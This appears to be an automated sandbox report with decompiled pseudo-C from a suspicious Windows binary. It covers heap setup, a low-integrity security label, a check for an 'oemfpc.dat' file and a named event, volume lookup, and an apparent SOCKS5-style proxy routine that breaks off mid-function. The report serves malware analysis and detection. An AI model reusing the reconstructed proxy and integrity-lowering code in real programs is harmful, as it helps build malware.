0x012b6fe8
0x012b6fe9
0x012b6fec
0x012b6fed
0x012b6fef
0x012b6ff4
0x012b6ffb
0x012b7036
0x012b7036
0x012b703a
0x012b703c
0x012b703e
0x012b7044
0x012b7047
0x012b7047
0x00000000
0x012b704a
0x012b700c
0x012b7017
0x012b7030
0x00000000
0x00000000
0x00000000
0x00000000
0x012b7017

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 012B6FCD
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,00000001), ref: 012B6FDE
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012B6FF4
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,00000001,00000000,00000000,?,00000001), ref: 012B700F
SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,00000001,00000000,00000000,?,00000001), ref: 012B7023
LocalFree.KERNEL32(?,?,00000001,00000000,00000000,?,00000001), ref: 012B7030

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 012B6FEF

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: c79e93b57b68e3b86b805cb2446b98885b9498a8b77a2b2bb060b9248986aa03
Instruction ID: 9e8865b129db0a76706872a7b46a9c16e027137702a7dc532ca1f672310a4832
Opcode Fuzzy Hash: c79e93b57b68e3b86b805cb2446b98885b9498a8b77a2b2bb060b9248986aa03
Instruction Fuzzy Hash: 5011467691020ABBEB219FE5DCC4EEEBBBCFB44780F15456AF651E1090D7719A009B60

Uniqueness

Uniqueness Score: -1.00%

Function 012B18F2 Relevance: 3.0, APIs: 2, Instructions: 14
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012B18F2(long __ecx) {
				void* _t1;
				void* _t2;

				_t1 = HeapCreate(0, __ecx, 0); // executed
				 *0x12dc348 = _t1;
				if(_t1 != 0) {
					 *0x12dc341 = 1;
					return _t1;
				} else {
					_t2 = GetProcessHeap();
					 *0x12dc348 = _t2;
					 *0x12dc341 = 0;
					return _t2;
				}
			}

0x012b3bae
0x012b3bb4
0x012b3bbb
0x012b3bd0
0x012b3bd7
0x012b3bbd
0x012b3bbd
0x012b3bc3
0x012b3bc8
0x012b3bcf
0x012b3bcf

APIs

HeapCreate.KERNELBASE(00000000,?,00000000), ref: 012B3BAE
GetProcessHeap.KERNEL32(?,00000000), ref: 012B3BBD

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Heap$CreateProcess
String ID:
API String ID: 1042935442-0
Opcode ID: 90d3d3278fdc6ba10057cf4e76813a3fdebfa55917ce61177f0e5148043ccfbe
Instruction ID: 8550443e97d32f920292b506c3e87fe41f1accf861031873df9eb046ec498dea
Opcode Fuzzy Hash: 90d3d3278fdc6ba10057cf4e76813a3fdebfa55917ce61177f0e5148043ccfbe
Instruction Fuzzy Hash: F1D0523895EB419FF7B1DB3CF84E7403AA4A708B02F90028DE402D5288EEB44150C722

Uniqueness

Uniqueness Score: -1.00%

Function 012C226C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E012C226C(void* __edi) {
				signed int _v5;
				char _v6;
				int _v12;
				short _v52;
				short _v564;
				void* _t35;
				signed int _t46;
				void* _t59;
				signed int _t69;
				short* _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				signed int _t81;
				signed int _t83;
				void* _t84;

				_t84 = __edi;
				_v5 = 0;
				_v6 = 0;
				_t35 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t35 == 0) {
					L9:
					GetModuleFileNameW(0,  &_v564, 0x104);
					_t77 = 0x5c;
					 *((short*)(L012B1ABE( &_v564, _t77) + 2)) = 0;
					_t78 = L"o.d";
					L012B101E( &_v564, 6);
					if((L012B1168( &_v564, _t78) & _t78) == 0xffffffff) {
						_t69 = 0xa;
						memset( &_v52, 0xbadbad, _t69 << 2);
						__imp__SHGetFolderPathW(0, 0x1a, 0, 0,  &_v564, _t84); // executed
						_t81 = L"\\oemfpc.dat";
						L012B101E( &_v564, 0x16);
						if((L012B1168( &_v564, _t81) & _t81) != 0xffffffff) {
							L012B12B7( &_v564,  &_v52, 0x10);
							_t59 = OpenEventW(0x1f0003, 0,  &_v52);
							if(_t59 != 0xffffffff) {
								SetEvent(_t59);
								L012B1640( &_v564);
								Sleep(0x1388);
							}
						}
					}
					if(L012B18C0(0) != 0) {
						L012B1910();
						if(_v6 == 0) {
							_t46 = E012C1FF5(__eflags, 1);
							_v5 = _t46;
						} else {
							L012B14BA();
							_v5 = L012B14B5();
							_t46 = L012B19D8();
						}
						if(_v5 == 0 || ( *0x12dc738 & 0x00000002) == 0) {
							goto L20;
						} else {
							Sleep(0xffffffff);
							return _t46;
						}
					}
					L20:
					__eflags = _v5;
					_t32 = _v5 == 0;
					__eflags = _t32;
					ExitProcess(0 | _t32);
				}
				_t83 = 0;
				if(_v12 <= 0) {
					L8:
					LocalFree(_t35);
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					_t75 =  *((intOrPtr*)(_t35 + _t83 * 4));
					if(_t75 != 0 &&  *_t75 == 0x2d) {
						_t76 =  *(_t75 + 2) & 0x0000ffff;
						if(_t76 != 0x66 && _t76 == 0x76) {
							_v6 = 1;
						}
					}
					_t83 = _t83 + 1;
				} while (_t83 < _v12);
				goto L8;
			}

0x012c226c
0x012c227c
0x012c227f
0x012c2289
0x012c2291
0x012c22c6
0x012c22d3
0x012c22db
0x012c22e9
0x012c22ef
0x012c22fa
0x012c230f
0x012c231d
0x012c2328
0x012c2336
0x012c233e
0x012c2349
0x012c235f
0x012c236c
0x012c237b
0x012c2384
0x012c2387
0x012c2393
0x012c239d
0x012c239d
0x012c2384
0x012c235f
0x012c23ac
0x012c23ae
0x012c23b6
0x012c23ce
0x012c23d3
0x012c23b8
0x012c23b8
0x012c23c2
0x012c23c5
0x012c23c5
0x012c23d9
0x00000000
0x012c23e4
0x012c23e6
0x012c23ee
0x012c23ee
0x012c23d9
0x012c23ef
0x012c23f1
0x012c23f4
0x012c23f4
0x012c23f8
0x012c23f8
0x012c2293
0x012c2298
0x012c22bf
0x012c22c0
0x00000000
0x00000000
0x00000000
0x00000000
0x012c229a
0x012c229a
0x012c229a
0x012c229f
0x012c22a7
0x012c22ae
0x012c22b5
0x012c22b5
0x012c22ae
0x012c22b9
0x012c22ba
0x00000000

APIs

GetCommandLineW.KERNEL32(?), ref: 012C2282
CommandLineToArgvW.SHELL32(00000000), ref: 012C2289
LocalFree.KERNEL32(00000000), ref: 012C22C0
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 012C22D3
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000006), ref: 012C2336
OpenEventW.KERNEL32(001F0003,00000000,?,00000010,?,00000006), ref: 012C237B
SetEvent.KERNEL32(00000000,?,00000006), ref: 012C2387
Sleep.KERNEL32(00001388,?,00000006), ref: 012C239D
Sleep.KERNEL32(000000FF,00000001,00000006), ref: 012C23E6
ExitProcess.KERNEL32 ref: 012C23F8

Strings

o.d, xrefs: 012C22EF
\oemfpc.dat, xrefs: 012C233E

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CommandEventLineSleep$ArgvExitFileFolderFreeLocalModuleNameOpenPathProcess
String ID: \oemfpc.dat$o.d
API String ID: 1607201041-971870140
Opcode ID: 5d168324c18d321fbfb296612b51adf5a4832f390f628f67f4498154c42767bb
Instruction ID: b4327f06a358e9c742a8ab91df6cd7be8c119b97bae56a1b1f06590b25c2576f
Opcode Fuzzy Hash: 5d168324c18d321fbfb296612b51adf5a4832f390f628f67f4498154c42767bb
Instruction Fuzzy Hash: DC41E831930245EAEB24EBB8ECE9AFD7779AF11710F14469DE301960D1DF784A88D721

Uniqueness

Uniqueness Score: -1.00%

Function 012BCB93 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E012BCB93(intOrPtr __ecx) {
				char _v5;
				intOrPtr _v12;
				short _v116;
				char _v192;
				char _v212;
				short _v732;
				intOrPtr* _t32;

				_t17 =  &_v732;
				_v12 = __ecx;
				_v5 = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17); // executed
				if(_t17 != 0) {
					L8:
					L012B15F5(_t17, _v12, 0, 0x10);
				} else {
					PathAddBackslashW( &_v732);
					_t32 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t32( &_v732,  &_v212, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW( &_v732);
						if(PathRemoveFileSpecW( &_v732) == 0) {
							goto L8;
						} else {
							PathAddBackslashW( &_v732);
							continue;
						}
						goto L9;
					}
					if(_v192 != 0x7b) {
						goto L8;
					} else {
						_v116 = 0;
						_t17 =  &_v192;
						__imp__CLSIDFromString(_t17, _v12);
						if(_t17 != 0) {
							goto L8;
						} else {
							_v5 = 1;
						}
					}
				}
				L9:
				return _v5;
			}

0x012bcba1
0x012bcbad
0x012bcbb0
0x012bcbb3
0x012bcbbb
0x012bcc3b
0x012bcc41
0x012bcbbd
0x012bcbca
0x012bcbcc
0x012bcbfb
0x012bcc0b
0x012bcc0f
0x00000000
0x00000000
0x012bcbdb
0x012bcbf0
0x00000000
0x012bcbf2
0x012bcbf9
0x00000000
0x012bcbf9
0x00000000
0x012bcbf0
0x012bcc19
0x00000000
0x012bcc1b
0x012bcc20
0x012bcc24
0x012bcc2b
0x012bcc33
0x00000000
0x012bcc35
0x012bcc35
0x012bcc35
0x012bcc33
0x012bcc19
0x012bcc46
0x012bcc4d

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 012BCBB3
PathAddBackslashW.SHLWAPI(?), ref: 012BCBCA
PathRemoveBackslashW.SHLWAPI(?), ref: 012BCBDB
PathRemoveFileSpecW.SHLWAPI(?), ref: 012BCBE8
PathAddBackslashW.SHLWAPI(?), ref: 012BCBF9
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 012BCC0B
CLSIDFromString.OLE32(0000007B,?), ref: 012BCC2B

Strings

{, xrefs: 012BCC11

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID: {
API String ID: 613918483-366298937
Opcode ID: 3be251aef2067e84ce914110bb73a5c17f519acd2fb9a9ce446812f934134da6
Instruction ID: e4d234af895ff2c31d54c3ba0fb6cbb6a94543c1b5ff154b3951b5a5cfc9b480
Opcode Fuzzy Hash: 3be251aef2067e84ce914110bb73a5c17f519acd2fb9a9ce446812f934134da6
Instruction Fuzzy Hash: 351181B1D1425DAADF209BA4EC8CFDE7BBCAB04390F0044A6A205F3040EB709A958F24

Uniqueness

Uniqueness Score: -1.00%

Function 012B9700 Relevance: 3.0, APIs: 2, Instructions: 29
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012B9700(WCHAR* __ecx, signed int __edx) {
				void* _t2;
				signed int _t6;
				signed int _t7;
				signed int _t10;
				signed int _t12;
				void* _t13;

				_t10 = __edx;
				_t7 = _t6 | 0xffffffff;
				_t12 = _t7; // executed
				_t2 = CreateFileW(__ecx, 0x80000000, 7, 0, 3, 0, 0); // executed
				_t13 = _t2;
				if(_t13 != _t7) {
					_t12 = L012B19FB(_t13);
					_t7 = _t10;
					CloseHandle(_t13);
				}
				return _t12;
			}

0x012b9700
0x012b9711
0x012b9715
0x012b9717
0x012b971d
0x012b9721
0x012b972b
0x012b972d
0x012b972f
0x012b972f
0x012b973c

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 012B9717
CloseHandle.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 012B972F

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 6f498a0c013a5905698c45d032835c6bdce522cea3f4b0a42e9b053cc91c485e
Instruction ID: 695dba1ac15847fa45ee9a4d47fea84e6f1c0175f52f3ba8bffedf0900c74f07
Opcode Fuzzy Hash: 6f498a0c013a5905698c45d032835c6bdce522cea3f4b0a42e9b053cc91c485e
Instruction Fuzzy Hash: A2E046A6B161216FE2242939AC88EBA1A9DD789671F250629BA16E7284CD648C060261

Uniqueness

Uniqueness Score: -1.00%

Function 012C1DD2 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E012C1DD2(signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				signed int _t12;
				signed int _t15;
				signed int _t16;
				long _t17;
				signed int _t18;
				signed int _t19;
				signed int _t20;
				signed int _t25;
				signed char _t27;
				void* _t32;
				void* _t33;

				_t33 = __esi;
				_t32 = __edi;
				_t27 = __ecx;
				if((__ecx & 0x00000001) == 0) {
					 *0x12dc738 =  *0x12dc738 & 0x00000000;
				}
				if(E012C1097(_t32, _t27) != 0) {
					L012B1654(E012B1C4E(E012B10A5(E012B18F2(0x80000)))); // executed
					L012B143D(); // executed
					_t12 = E012C11C5(_t27, 1);
					__eflags = _t12;
					if(_t12 == 0) {
						goto L3;
					} else {
						_push(_t27);
						__eflags = E012C1246();
						if(__eflags == 0) {
							goto L3;
						} else {
							_t15 = E012C12F0(1, _t33, __eflags);
							__eflags = _t15;
							if(_t15 == 0) {
								goto L3;
							} else {
								_t16 = E012C132C(_t15, _t27);
								__eflags = _t16;
								if(_t16 == 0) {
									goto L3;
								} else {
									_t17 = GetCurrentProcessId();
									 *0x12dca04 =  *0x12dca04 & 0x00000000;
									 *0x12dca00 = _t17;
									_t18 = E012C138F();
									__eflags = _t18;
									if(_t18 == 0) {
										goto L3;
									} else {
										_t19 = E012C1D0F(_t32, _t27);
										__eflags = _t19;
										if(_t19 == 0) {
											goto L3;
										} else {
											_t20 = E012C1468(_t27);
											__eflags = _t20;
											if(_t20 == 0) {
												goto L3;
											} else {
												E012B1014();
												E012B12C1();
												E012B1BD6();
												E012B148D();
												_t25 = E012C1D52(_t27, __eflags);
												__eflags = _t25;
												_t4 = _t25 != 0;
												__eflags = _t4;
												return _t25 & 0xffffff00 | _t4;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L3:
					return 0;
				}
			}

0x012c1dd2
0x012c1dd2
0x012c1dd3
0x012c1dd8
0x012c1dda
0x012c1dda
0x012c1de9
0x012c1e05
0x012c1e0a
0x012c1e11
0x012c1e16
0x012c1e18
0x00000000
0x012c1e1a
0x012c1e1a
0x012c1e20
0x012c1e22
0x00000000
0x012c1e24
0x012c1e24
0x012c1e29
0x012c1e2b
0x00000000
0x012c1e2d
0x012c1e2e
0x012c1e33
0x012c1e35
0x00000000
0x012c1e37
0x012c1e37
0x012c1e3d
0x012c1e44
0x012c1e49
0x012c1e4e
0x012c1e50
0x00000000
0x012c1e52
0x012c1e53
0x012c1e58
0x012c1e5a
0x00000000
0x012c1e5c
0x012c1e5d
0x012c1e62
0x012c1e64
0x00000000
0x012c1e66
0x012c1e66
0x012c1e6b
0x012c1e70
0x012c1e75
0x012c1e7a
0x012c1e7f
0x012c1e81
0x012c1e81
0x012c1e85
0x012c1e85
0x012c1e64
0x012c1e5a
0x012c1e50
0x012c1e35
0x012c1e2b
0x012c1e22
0x012c1deb
0x012c1deb
0x012c1dee
0x012c1dee

APIs

Part of subcall function 012B18F2: HeapCreate.KERNELBASE(00000000,?,00000000), ref: 012B3BAE
Part of subcall function 012B18F2: GetProcessHeap.KERNEL32(?,00000000), ref: 012B3BBD

Part of subcall function 012B1C4E: InitializeCriticalSection.KERNEL32(012DCD98), ref: 012C2BBA

GetCurrentProcessId.KERNEL32 ref: 012C1E37

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: HeapProcess$CreateCriticalCurrentInitializeSection
String ID:
API String ID: 1756877647-0
Opcode ID: cbede552a07a219b6d51011ba8ad2d7f774ba8147bb83f735c7d63b0dcb93cd2
Instruction ID: 5c1807825b97d08b11c3610d493d5ce383ba99176c2c56a5e183ae7d847f59f0
Opcode Fuzzy Hash: cbede552a07a219b6d51011ba8ad2d7f774ba8147bb83f735c7d63b0dcb93cd2
Instruction Fuzzy Hash: 3D0171A0131393C2EE20BBF479E73F9175A5F32B96F140ACC5B4167187CB2990399122

Uniqueness

Uniqueness Score: -1.00%

Function 012B6814 Relevance: 1.5, APIs: 1, Instructions: 12
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 012B6829

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: deeb79aa540c86ab5620d05d02eda0928124bde33627b947fcf0830214d2e6bc
Instruction ID: 38831a8b6f168f427fb364770a7ee79ec9a54ac88762458e80e55700e5d45fa4
Opcode Fuzzy Hash: deeb79aa540c86ab5620d05d02eda0928124bde33627b947fcf0830214d2e6bc
Instruction Fuzzy Hash: 3BC08C319802185AEB106270E90FAA5736C9706B44F0002A42612C20CAA2A0940E0661

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012C976D Relevance: 20.2, APIs: 13, Instructions: 695
networkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E012C976D(intOrPtr __ecx, signed int __edx, void* __eflags) {
				signed int _t268;
				signed int _t272;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				void* _t285;
				signed int _t287;
				signed int _t289;
				signed int _t292;
				signed int _t297;
				signed int _t299;
				signed int _t312;
				signed int _t314;
				intOrPtr _t315;
				void* _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t326;
				void* _t332;
				void* _t341;
				signed int _t344;
				void* _t345;
				signed short _t353;
				signed int _t359;
				signed int _t361;
				signed char _t362;
				signed int _t368;
				signed int _t369;
				signed short _t373;
				signed int _t384;
				signed int _t385;
				signed int _t387;
				signed int _t390;
				signed int _t391;
				signed int _t394;
				void* _t396;
				signed char _t400;
				void* _t402;
				void* _t403;
				signed int _t404;
				signed int _t405;
				intOrPtr _t419;
				signed int _t422;
				intOrPtr _t449;
				intOrPtr _t457;
				void* _t460;
				signed char _t483;
				signed char _t487;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t496;
				signed int _t497;
				void* _t498;
				void* _t499;
				signed int _t500;
				signed int _t501;
				signed int _t505;
				intOrPtr _t506;
				void* _t507;
				signed int _t509;
				void* _t510;
				void* _t512;

				_t510 = _t512 - 0x78;
				 *(_t510 + 0x68) = __edx;
				 *((intOrPtr*)(_t510 + 0x70)) = __ecx;
				_t400 = 0 | L012B185C(__ecx) == 0x00000017;
				 *(_t510 + 0x50) = _t400;
				if(L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x77, 1,  *(_t510 + 0x68)) == 0 ||  *(_t510 + 0x77) == 0 || L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 - 0x2f0,  *(_t510 + 0x77) & 0x000000ff,  *(_t510 + 0x68)) == 0) {
					L41:
					_t268 = 0;
					__eflags = 0;
					goto L42;
				} else {
					_t272 = L012B11EA(_t510 - 0x2f0, 0,  *(_t510 + 0x77) & 0x000000ff);
					asm("sbb eax, eax");
					_t492 = 2;
					 *(_t510 + 0x60) = ( ~_t272 & 0xffff0100) + 0x0000ff05 & 0x0000ffff;
					if(L012B182A(( ~_t272 & 0xffff0100) + 0x0000ff05 & 0x0000ffff,  *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x60, _t492) == 0) {
						goto L41;
					}
					if( *(_t510 + 0x60) != 0xff05) {
						 *((char*)(_t510 + 0x6c)) = 0;
						_t278 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x40, 4,  *(_t510 + 0x68));
						__eflags = _t278;
						if(_t278 == 0) {
							goto L41;
						}
						__eflags =  *((char*)(_t510 + 0x40)) - 5;
						if( *((char*)(_t510 + 0x40)) != 5) {
							goto L41;
						} else {
							__eflags = _t400 & 0x00000001;
							if((_t400 & 0x00000001) == 0) {
								 *(_t510 + 0x30) = _t492;
								 *(_t510 + 0x34) = 0x17;
							} else {
								 *(_t510 + 0x30) = 0x17;
								 *(_t510 + 0x34) = _t492;
							}
							_t505 = 0;
							_t280 = ( *(_t510 + 0x43) & 0x000000ff) - 1;
							__eflags = _t280;
							 *(_t510 + 0x48) = 0;
							_t402 = 0x10;
							if(_t280 == 0) {
								_t281 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x28, 4,  *(_t510 + 0x68));
								__eflags = _t281;
								if(_t281 == 0) {
									goto L41;
								}
								_t505 = L012B1C17(_t402);
								 *(_t510 + 0x48) = _t505;
								__eflags = _t505;
								if(_t505 != 0) {
									 *_t505 = _t492;
									_push(4);
									_push(_t510 + 0x28);
									_t77 = _t505 + 4; // 0x4
									_t285 = _t77;
									L38:
									_push(_t285);
									L012B1947();
									L39:
									_t287 = L012B19E7( *((intOrPtr*)(_t510 + 0x70)), _t510 + 0x3c, _t492,  *(_t510 + 0x68));
									__eflags = _t287;
									if(_t287 != 0) {
										_t493 = _t492 | 0xffffffff;
										__eflags =  *((char*)(_t510 + 0x6c));
										 *(_t510 + 0x77) = 1;
										if( *((char*)(_t510 + 0x6c)) != 0) {
											L142:
											L012B1933( *(_t510 + 0x48));
											_t268 =  *(_t510 + 0x77);
											__eflags = _t268 - 1;
											if(_t268 == 1) {
												__eflags =  *((char*)(_t510 + 0x6c));
												if( *((char*)(_t510 + 0x6c)) != 0) {
													_push( *(_t510 + 0x50));
													_push( *((intOrPtr*)(_t510 + 0x6c)));
													_push(0xffffffff);
													_push( *((intOrPtr*)(_t510 + 0x70)));
													_t289 = E012C9668();
													__eflags = _t289;
													_t268 = _t289 & 0xffffff00 | _t289 != 0x00000000;
												}
											}
											goto L42;
										}
										 *((short*)(_t505 + 2)) =  *((intOrPtr*)(_t510 + 0x3c));
										_t292 = ( *(_t510 + 0x41) & 0x000000ff) - 1;
										__eflags = _t292;
										if(_t292 == 0) {
											_t506 = L012B173F(_t505);
											__eflags = _t506 - _t493;
											if(_t506 != _t493) {
												L012B17B2(_t506, 1);
												_push( *(_t510 + 0x50));
												_push(0);
												_push(_t506);
												_push( *((intOrPtr*)(_t510 + 0x70)));
												_t295 = E012C9668();
												__eflags = _t295 - 1;
												if(_t295 != 1) {
													__eflags = _t295 - _t493;
													if(_t295 != _t493) {
														 *(_t510 + 0x77) = 0;
													} else {
														 *((char*)(_t510 + 0x6c)) = 1;
													}
												} else {
													_t295 = L012B108C( *((intOrPtr*)(_t510 + 0x70)), _t506);
												}
												_t419 = _t506;
												L141:
												L012B1B22(_t295, _t419);
												goto L142;
											}
											L134:
											 *((char*)(_t510 + 0x6c)) = 5;
											goto L142;
										}
										_t297 = _t292 - 1;
										__eflags = _t297;
										if(_t297 == 0) {
											__eflags =  *_t505 - 0x17;
											 *((short*)(_t505 + 2)) = 0;
